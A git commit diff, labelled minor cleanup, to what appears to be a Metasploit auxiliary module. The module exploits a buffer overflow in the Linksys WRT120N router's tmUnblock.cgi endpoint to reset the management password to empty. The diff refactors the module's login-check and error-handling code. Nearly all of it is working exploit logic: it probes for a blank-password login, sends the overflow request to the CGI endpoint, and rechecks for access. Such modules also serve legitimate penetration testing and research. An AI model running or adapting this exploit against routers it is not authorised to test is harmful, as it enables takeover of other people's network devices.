Do minor cleanup

bug/bundler_fix
jvazquez-r7 2014-02-26 09:32:11 -06:00
parent b79197b8ab
commit 582372ec3e
1 changed files with 39 additions and 37 deletions

View File

@ -13,9 +13,10 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => 'Linksys WRT120N tmUnblock Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability in the WRT120N Linksys router.
It is possible to reset the password of the management interface temporarily to an
empty value. It was tested on a WRT120N firmware version 1.0.07.
This module exploits a buffer overflow vulnerability in the WRT120N Linksys router
to reset the password of the management interface temporarily to an empty value.
This module has been tested successfully on a WRT120N device with firmware version
1.0.07.
},
'Author' =>
[
@ -32,35 +33,36 @@ class Metasploit3 < Msf::Auxiliary
'DisclosureDate' => 'Feb 19 2014'))
end
def check_login(user,pass)
def check_login(user)
print_status("#{peer} - Trying to login with #{user} and empty password")
begin
res = send_request_cgi({
'uri' => '/',
'method' => 'GET',
'authorization' => basic_auth(user,"")
})
if res.nil? or res.code == 404
if res.nil? || res.code == 404
print_status("#{peer} - No successful login possible with #{user} and empty password")
return false
end
if [200, 301, 302].include?(res.code)
elsif [200, 301, 302].include?(res.code)
print_good("#{peer} - Successful login #{user} and empty password")
return true
else
print_status("#{peer} - No successful login possible with #{user} and empty password")
return false
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
def run
if (check_login("admin","") == true)
begin
if check_login("admin")
print_good("#{peer} - login with user admin and no password possible. There is no need to use this module.")
return
end
rescue ::Rex::ConnectionError
print_error("#{peer} - Failed to connect to the web server")
return
end
uri = '/cgi-bin/tmUnblock.cgi'
@ -93,7 +95,7 @@ class Metasploit3 < Msf::Auxiliary
}
})
if res and res.code == 500
if (check_login("admin","") == true)
if check_login("admin")
print_good("#{peer} - Expected answer and the login was successful. Try to login with the user admin and a blank password")
else
print_status("#{peer} - Expected answer, but unknown exploiting status. Try to login with the user admin and a blank password")
@ -102,7 +104,7 @@ class Metasploit3 < Msf::Auxiliary
print_error("#{peer} - Unexpected answer. Exploiting attempt has failed")
end
rescue ::Rex::ConnectionError
vprint_error("#{peer} - Failed to connect to the web server")
print_error("#{peer} - Failed to connect to the web server")
return
end
end